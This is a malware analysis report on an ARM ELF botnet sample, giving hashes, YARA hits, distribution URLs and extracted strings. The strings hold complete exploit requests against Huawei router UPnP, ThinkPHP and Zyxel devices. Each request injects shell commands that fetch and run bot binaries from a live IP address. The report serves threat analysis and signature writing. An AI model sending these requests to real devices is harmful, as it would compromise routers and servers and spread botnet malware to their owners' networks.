Sample details: 73c2158676e8293bd218607493879790

Hashes
MD5: 73c2158676e8293bd218607493879790
SHA1: 9a8256a41b7560a0316af5e909729d06614db634
SHA256: 63b1df91c98d7615f960f1445df234d2beee25cad0748a6670c9e98f4b994d87
SSDEEP: 1536:2NnxhBEKdtwOcjrqSzRn+uC1kKgYrGWVti7fnmXp6C1U9Pwh95ymI518scFpIpi4:SBPdiOerxzZ+l1kHYaoti7fmXMCqy3Mg
Details
File Type: ELF (ARM build, judging by the `.ARM.attributes` section name in the strings below and the `.arm6` suffix of the source filename; the embedded payloads fetch separate `.mips` and `.x86` builds of the same bot for other architectures)
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source (URLs the sample was retrieved from; these are live malware-distribution endpoints — do not fetch them from a production network)
http://192.227.176.105:80/bins/UnHAnaAW.arm6
http://192.227.176.105/bins/UnHAnaAW.arm6
Strings (extracted verbatim from the sample; several lines between the two HTTP requests are non-printable/encoded table data rather than mis-rendered text, and the ThinkPHP request path appears to contain literal control characters that split it across lines — keep these bytes as-is when deriving indicators or signatures)
		POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.227.176.105 -l /tmp/binary -r /bins/UnHAnaAW.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Selfrep.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
192.227.176.105
<!: acam
 18:1 
0125!8 
$5''#;&0
'!$$;& 
?;d509=:
:217 10t
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;!&71t
:3=:1t
GET /index.php?s=/index/	hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://192.227.176.105/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://192.227.176.105/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
.shstrtab
.rodata
.init_array
.fini_array
.ARM.attributes